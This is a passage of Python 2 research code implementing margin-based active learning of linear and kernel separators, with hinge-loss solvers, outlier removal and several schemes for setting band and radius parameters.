ratio =0.0
for i in range(len(U)):
if sign(dot(old_w,U[i])) != sign(dot(self.w,U[i])):
if abs(dot(old_w, U[i])) < b[k-1]:
dis_disregion += 1
else:
dis_aggregion += 1
print 'In iteration ' + str(k-1) + ' disagreement within margin is ' + str(dis_disregion) + ' disagreement outside margin is ' + str(dis_aggregion)
if dis_disregion ==0:
ratio=0
else:
ratio= float(dis_aggregion/dis_disregion)
print 'Ratio of disagreement is ' + str(ratio)
print '\n'
'''
old_w = self.w
# clearing the working set and making tempx zero
workingset = []
tempx = array([]).reshape((0,self.d))
#print self.w
while (len(workingset) <= int(m[k+1])) and (len(used) < count):
p = len(used)
used.add(ids[p])
if abs(dot(self.w, U[p])) >= b[k]:
continue
else:
workingset.append(ids[p])
tempx = vstack((tempx, U[p]))
k +=1
'''
USE This
Base implementation of the Margin Based Method incorporating different strategies and options for execution
Based on STOC 2014 paper - The power of localization in effectively learning linear separators
Initialization based on the averaging algorithm
Hinge loss solver can be - cvxopt, sgd, hard_cvxopt and svm
Implements outlier removal
'''
class MarginBasedActiveLearnerBase(LinearLearner, ActiveBatchLearner):
def __init__(self, d, num_iters):
LinearLearner.__init__(self, d, w = None)
self.num_iters = num_iters
self.separators = []
self.pointsusage = 0
self.combine_final = False
def initialize_weights(self, X, Y):
# Use PCA
#pca = PCA(self.d)
#pca.pca_run(X)
#self.w = pca.w
# Use averaging algo
avg = Average(self.d)
avg.batch_train(X,Y)
self.w = avg.w
def hinge_loss_minimization(self, X, Y, tau, w, r):
if SOLVER == "cvxopt":
qp = QP(self.d)
qp.train(X, Y, r, tau, w)
self.w = qp.w
elif SOLVER == 'sgd':
sgd = HingeLossSGD2(self.d, tau, w, r)
sgd.batch_train(X, Y)
self.w = sgd.w
elif SOLVER == 'hard_cvxopt':
qp = QP_hardmargin(self.d)
qp.train(X, Y, r, tau, w)
self.w = qp.w
elif SOLVER == 'svm':
qp = soft_SVM(self.d, tau)
qp.batch_train(X,Y)
self.w = qp.w
else:
raise ValueError, 'Solver %s not implemented.' % SOLVER
def active_batch_train(self, U, ids, oracle, label_budget):
itr = self.num_iters
count = len(U)
# Set up number of examples in each iteration
m, n = self.compute_sizes(count, label_budget, itr)
# Print some initialization info
print
print self.__class__.__name__
print 'Iterations:', itr
print 'm:', m
print 'n:', n
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(m[0]):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
#print "Ids picked up in the first iteration of the active algorithm"
#print used
# Pick starting weight vector based on initial sample
self.initialize_weights(X, Y)
self.separators.append(self.w)
# Keep track of all labeled data
R = array([]).reshape((0, self.d))
S = array([]).reshape((0, 1))
for k in range(1, itr):
b, t, r = self.set_parameters(U, k)
# Print current iteration info
print
print 'k:', k
print 'b:', b
print 't:', t
print 'r:', r
# Set of points to send to outlier removal
P = array([]).reshape((0,self.d))
workingset = []
# Find n[k] additional points within the band
while (len(workingset) < n[k]) and (len(used) < count):
next = len(used)
used.add(ids[next])
if abs(dot(self.w, U[next])) <= b:
P = vstack((P, U[next]))
workingset.append(ids[next])
print "Ids choosen in iteration " + str(k)
print workingset
# Check unlabeled data usage and break if necessary
if len(workingset) != n[k]:
print
print 'Out of unlabled data.'
break
# Perform outlier removal on P
chosen = self.outlier_removal(P, m[k], b, r, t, self.w)
assert len(chosen) == m[k]
# Query labels of the selected points
X = P[chosen]
Y = array([]).reshape((0, 1))
for i in chosen:
Y = vstack((Y, array([oracle(workingset[i])]).reshape(1,1)))
R = vstack((R, X))
S = vstack((S, Y))
# Perform constrained hinge loss minimization on X, Y
SOLVER = 'soft_cvxopt'
self.hinge_loss_minimization(X, Y, t, self.w, r)
self.separators.append(self.w)
print "weight vector in iteration " + str(k)
print self.w
# Print some end of iteration info?
# Calculate the final weight vector based on points labeled so far.
if self.combine_final:
for i in range(len(workingset)):
if len(S) + m[0] < label_budget:
R = vstack((R, P[i]))
S = vstack((S, array([oracle(workingset[i])]).reshape(1,1)))
else:
break
self.hinge_loss_minimization(R, S, t, self.w, r)
self.separators.append(self.w)
print "Final Weight Vector"
print self.w
self.pointsusage = len(S) + m[0]
# Print final info
print
print 'Label usage:'
print 'budget:', label_budget
print 'used: ', self.pointsusage
print
print 'Unlabeled usage:'
print 'total:', count
print 'used: ', len(used)
'''
Only adverserial
specific initialization of parameters
'''
class MarginBasedBasic(MarginBasedActiveLearnerBase):
def __init__(self, d, num_iters):
MarginBasedActiveLearnerBase.__init__(self, d, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Default is no outlier removal, so n = m
for i in range(num_iters):
n[i] = m[i]
return m, n
def outlier_removal(self, P, m, b, r, tau, w):
# No outlier removal. Return all indices.
return array(range(m))
'''
Basic with Outlier Removal
'''
class MarginBasedOutlierRemoval(MarginBasedActiveLearnerBase):
def __init__(self, d, num_iters):
MarginBasedActiveLearnerBase.__init__(self, d, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Number of unlabeled examples available for outlier removal
#n_total = 0.1 * unlabeled
n_total = 10 * labeled
# Increase n_i exponentially
denom = sum(2.0**i for i in range(0, num_iters))
for i in range(num_iters):
n[i] = int(n_total * 2.0**i / denom) + m[i]
return m, n
def outlier_removal(self, P, m, b, r, tau, w):
n = P.shape[0]
# Compute distribution Q over examples in P
outlier = OutlierRemoval(self.d)
outlier.train(P, b, r, tau, w, 0.1)
Q = outlier.weightdist
Q /= lin.norm(Q, 1)
# Sample random indices based on resulting Q
chosen = nprandom.choice(n, size = m, replace = False, p = Q)
return chosen
'''
Set the theoretical parameters
'''
class Theoretical:
def set_parameters(self, U, k):
# Constants for theoretical parameters
c1 = 1.0
c2 = 1.0
c3 = pi
# Parameters for iteration k
b = c1 * pow(2, -k) * pow(self.d, -0.5)
t = c2 * b
r = c3 * pow(2, -k)
return b, t, r
'''
Call this class for running the algorithm under adverserial noise with parameters initialized using theoretical specifications
'''
class MarginBasedTheoreticalParams(MarginBasedBasic, Theoretical):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
'''
Call this class for running the algorithm under malicious noise with parameters initialized using theoretical specifications
'''
class MarginBasedTheoreticalParamsOR(MarginBasedOutlierRemoval, Theoretical):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class VarianceMethod:
def set_parameters(self, U, k):
# Constants for the variance method
c1 = 1.0
c2 = 0.25
c3 = 1.0
# Compute distances and standard deviation
dotdistance = abs(self.margin(U))
std_dev = std(dotdistance)
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
# Parameters for iteration k
b = c1 * std_dev * pow(2,-k+2)
t = c2 * b
r = param.radiusparam
return b, t, r
class LinearNoiseMethodVarianceBatch(MarginBasedBasic, VarianceMethod):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodVarianceBatchOR(MarginBasedOutlierRemoval, VarianceMethod):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class AllExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
#print "parameters selected for allexp in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class AllInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
#print "parameters selected for allinv in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class AllLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#print "parameters selected for alllin in kernel method"
b = param.bandparam
t = 0.25 * b
r = param.radiusparam
return b, t, r
class ExpInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class ExpLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "exp")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "lin")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class InvExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "exp")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class InvLin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "inv")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "lin")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinExp:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "exp")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = param1.radiusparam
return b, t, r
class LinConstInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.01
r = param1.radiusparam
return b, t, r
class LinIncInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 10 * b
r = param1.radiusparam
return b, t, r
class LinDecInv:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
param1 = BandSelection(self.d, self.num_iters)
param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.01 * b
r = param1.radiusparam
return b, t, r
class LinConst:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#param1 = BandSelection(self.d, self.num_iters)
#param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = sqrt(2)
return b, t, r
class LinMin:
def set_parameters(self, U, k):
# Compute distances and standard deviation
row, col = U.shape
dotdistance = zeros((row,))
for i in range(row):
dotdistance[i] = abs(self.margin(U[i]))
# Parameters for iteration k
param = BandSelection(self.d, self.num_iters)
param.param_calc(dotdistance, k, "lin")
#param1 = BandSelection(self.d, self.num_iters)
#param1.param_calc(dotdistance, k, "inv")
b = param.bandparam
t = 0.25 * b
r = dotdistance[0]
return b, t, r
class LinearNoiseMethodAllExpConstantsBatch(MarginBasedBasic, AllExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllExpConstantsBatchOR(MarginBasedOutlierRemoval, AllExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodAllInvConstantsBatch(MarginBasedBasic, AllInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllInvConstantsBatchOR(MarginBasedOutlierRemoval, AllInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodAllLinConstantsBatch(MarginBasedBasic, AllLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodAllLinConstantsBatchOR(MarginBasedOutlierRemoval, AllLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodExpInvConstantsBatch(MarginBasedBasic, ExpInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodExpInvConstantsBatchOR(MarginBasedOutlierRemoval, ExpInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodExpLinConstantsBatch(MarginBasedBasic, ExpLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodExpLinConstantsBatchOR(MarginBasedOutlierRemoval, ExpLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodInvExpConstantsBatch(MarginBasedBasic, InvExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodInvExpConstantsBatchOR(MarginBasedOutlierRemoval, InvExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodInvLinConstantsBatch(MarginBasedBasic, InvLin):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodInvLinConstantsBatchOR(MarginBasedOutlierRemoval, InvLin):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodLinExpConstantsBatch(MarginBasedBasic, LinExp):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodLinExpConstantsBatchOR(MarginBasedOutlierRemoval, LinExp):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class LinearNoiseMethodLinInvConstantsBatch(MarginBasedBasic, LinInv):
def __init__(self, d, num_iters):
MarginBasedBasic.__init__(self, d, num_iters)
class LinearNoiseMethodLinInvConstantsBatchOR(MarginBasedOutlierRemoval, LinInv):
def __init__(self, d, num_iters):
MarginBasedOutlierRemoval.__init__(self, d, num_iters)
class OptimalSeparator(LinearLearner, ActiveBatchLearner):
def __init__(self, d, mean1, mean2):
self.center1 = mean1
self.center2 = mean2
self.d = d
def active_batch_train(self, U, ids, oracle, label_budget):
self.w = self.center1 - self.center2
self.w /= norm(self.w,2)
################################################################################
# The following is the kernel-based version that could probably replace much of
# the above code once we confirm that it works well.
class KernelMarginBasedActiveLearnerBase(KernelLearner, ActiveBatchLearner):
def __init__(self, d, kernel, num_iters):
KernelLearner.__init__(self, d, kernel)
self.num_iters = num_iters
self.separators = []
self.pointsusage = 0
self.combine_final = False
def initialize_weights(self, X, Y):
# Use averaging algo
self.support = [[Y[i], X[i]] for i in range(len(Y))]
def hinge_loss_minimization(self, X, Y, tau, radius, prevw):
if SOLVER == 'cvxopt':
qp = KernelQPwithLinearBand(self.d, self.kernel)
qp.train(X, Y, tau, radius, prevw)
self.support = qp.support
elif SOLVER == 'sgd':
sgd = KernelHingeLossSGD2(self.d, tau)
sgd.batch_train(X, Y)
self.support = sgd.support
else:
raise ValueError, 'Solver %s not implemented.' % SOLVER
def active_batch_train(self, U, ids, oracle, label_budget):
itr = self.num_iters
count = len(U)
# Set up number of examples in each iteration
m, n = self.compute_sizes(count, label_budget, itr)
'''
# Print some initialization info
print
print self.__class__.__name__
print 'Iterations:', itr
print 'm:', m
print 'n:', n
'''
# access to the training examples and their labels
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0,1))
used = set()
for i in range(m[0]):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape(1,1)))
used.add(ids[i])
# Pick starting weight vector based on initial sample
self.initialize_weights(X, Y)
# Keep track of all labeled data
R = array([]).reshape((0, self.d))
S = array([]).reshape((0, 1))
for k in range(1, itr):
b, t, r = self.set_parameters(U, k)
if b == 0:
t = pow(0.1,k)
# Print current iteration info
#print
#print 'k:', k
#print 'b:', b
#print 't:', t
#print 'r:', r
# Set of points to send to outlier removal
P = array([]).reshape((0,self.d))
workingset = []
# Find n[k] additional points within the band
while (len(workingset) < n[k]) and (len(used) < count):
next = len(used)
used.add(ids[next])
if abs(self.margin(U[next])) <= b:
P = vstack((P, U[next]))
workingset.append(ids[next])
# Check unlabeled data usage and break if necessary
if len(workingset) != n[k]:
print
print 'Out of unlabled data.'
break
# Perform outlier removal on P
chosen = self.outlier_removal(P, m[k], b, t)
assert len(chosen) == m[k]
# Query labels of the selected points
X = P[chosen]
Y = array([]).reshape((0, 1))
for i in chosen:
Y = vstack((Y, array([oracle(workingset[i])]).reshape(1,1)))
R = vstack((R, X))
S = vstack((S, Y))
# Perform constrained hinge loss minimization on X, Y
self.hinge_loss_minimization(X, Y, t, r, self.support)
# Print some end of iteration info?
# Calculate the final weight vector based on points labeled so far.
if self.combine_final:
for i in range(len(workingset)):
if len(S) + m[0] < label_budget:
R = vstack((R, P[i]))
S = vstack((S, array([oracle(workingset[i])]).reshape(1,1)))
else:
break
self.hinge_loss_minimization(R, S, t, r, self.support)
self.pointsusage = len(S) + m[0]
'''
# Print final info
print
print 'Label usage:'
print 'budget:', label_budget
print 'used: ', self.pointsusage
print
print 'Unlabeled usage:'
print 'total:', count
print 'used: ', len(used)
'''
class KernelMarginBasedBasic(KernelMarginBasedActiveLearnerBase):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedActiveLearnerBase.__init__(self, d, kernel, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Default is no outlier removal, so n = m
for i in range(num_iters):
n[i] = m[i]
return m, n
def outlier_removal(self, P, m, b, tau):
# No outlier removal. Return all indices.
return array(range(m))
class KernelMarginBasedOutlierRemoval(KernelMarginBasedActiveLearnerBase):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedActiveLearnerBase.__init__(self, d, kernel, num_iters)
def compute_sizes(self, unlabeled, labeled, num_iters):
m = [0] * num_iters
n = [0] * num_iters
# Increase m_i logarithmically
denom = sum(log(i + 2) for i in range(num_iters))
for i in range(num_iters):
m[i] = int(labeled * log(i + 2) / denom)
# Add remaining label budget to last iteration
m[num_iters - 1] += labeled - sum(m)
# Number of unlabeled examples available for outlier removal
#n_total = 0.1 * unlabeled
n_total = 10 * labeled
# Increase n_i exponentially
denom = sum(2.0**i for i in range(0, num_iters))
for i in range(num_iters):
n[i] = int(n_total * 2.0**i / denom) + m[i]
return m, n
def outlier_removal(self, P, m, b, tau):
# TODO: Fix this to remove dependence on w and r.
n = P.shape[0]
# Compute distribution Q over examples in P
outlier = OutlierRemoval(self.d)
outlier.train(P, b, r, tau, w, 0.1)
Q = outlier.weightdist
Q /= lin.norm(Q, 1)
# Sample random indices based on resulting Q
chosen = nprandom.choice(n, size = m, replace = False, p = Q)
return chosen
class KernelMarginBasedTheoreticalParams(KernelMarginBasedBasic, Theoretical):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelMarginBasedTheoreticalParamsOR(KernelMarginBasedOutlierRemoval, Theoretical):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodVarianceBatch(KernelMarginBasedBasic, VarianceMethod):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodVarianceBatchOR(KernelMarginBasedOutlierRemoval, VarianceMethod):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllExpConstantsBatch(KernelMarginBasedBasic, AllExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllInvConstantsBatch(KernelMarginBasedBasic, AllInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllLinConstantsBatch(KernelMarginBasedBasic, AllLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodAllLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, AllLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpInvConstantsBatch(KernelMarginBasedBasic, ExpInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, ExpInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpLinConstantsBatch(KernelMarginBasedBasic, ExpLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodExpLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, ExpLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvExpConstantsBatch(KernelMarginBasedBasic, InvExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, InvExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvLinConstantsBatch(KernelMarginBasedBasic, InvLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodInvLinConstantsBatchOR(KernelMarginBasedOutlierRemoval, InvLin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinExpConstantsBatch(KernelMarginBasedBasic, LinExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinExpConstantsBatchOR(KernelMarginBasedOutlierRemoval, LinExp):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinInvConstantsBatch(KernelMarginBasedBasic, LinInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinInvConstantsBatchOR(KernelMarginBasedOutlierRemoval, LinInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedOutlierRemoval.__init__(self, d, kernel, num_iters)
# Added classes for testing
class KernelLinearNoiseMethodLinConstInvConstantsBatch(KernelMarginBasedBasic, LinConstInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinIncInvConstantsBatch(KernelMarginBasedBasic, LinIncInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinDecInvConstantsBatch(KernelMarginBasedBasic, LinDecInv):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinConstConstantsBatch(KernelMarginBasedBasic, LinConst):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class KernelLinearNoiseMethodLinMinConstantsBatch(KernelMarginBasedBasic, LinMin):
def __init__(self, d, kernel, num_iters):
KernelMarginBasedBasic.__init__(self, d, kernel, num_iters)
class ActiveKernelQP(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
X = zeros((m,self.d))
Y = zeros((m,1))
for i in range(m):
X[i] = U[i]
Y[i] = oracle(ids[i])
qp = KernelQP(self.d, self.kernel)
qp.train(X, Y, self.C)
self.support = qp.support
class ActiveKernelQPwithLinearBand(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
X = zeros((m,self.d))
Y = zeros((m,1))
for i in range(m):
X[i] = U[i]
Y[i] = oracle(ids[i])
# Randomly initialize support values
self.support = [[0.5*Y[i], X[i]] for i in range(len(Y))]
#b, t, r = self.set_parameters(U, 1)
r = sqrt(2);
qp = KernelQPwithLinearBand(self.d, self.kernel)
qp.train(X, Y, self.C, r, self.support)
self.support = qp.support
class KernelPassiveSVM(KernelLearner, ActiveBatchLearner, ActiveSourceLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = Kernel_soft_SVM(self.d, self.C, self.kernel)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.support = svm.support
def active_source_train(self, source, oracle, label_budget):
U, ids = source(label_budget)
self.active_batch_train(U, ids, oracle, label_budget)
class KernelSimpleMarginSoftSVMBatch(KernelLearner, ActiveBatchLearner):
def __init__(self, d, C, kernel):
KernelLearner.__init__(self, d, kernel)
self.C = C
self.initial_sample = 5
def active_batch_train(self, U, ids, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
labeled = []
# Query the labels of some examples
start = min(self.initial_sample, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
labeled.append(ids[i])
# Run standard SVM on the labeled data
#svm = StochasticDualCoordinateAscent(self.d, self.C, self.kernel)
#svm.train(X, Y)
svm = Kernel_soft_SVM(self.d, self.C, self.kernel)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
margins = []
# Find the unlabeled example with the smallest margin
for i in range(len(U)):
margins.append(abs(svm.margin(U[i])))
min_margin = inf
min_index = 0
for i in range(len(U)):
if ids[i] in used:
continue
cur_margin = margins[i]
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
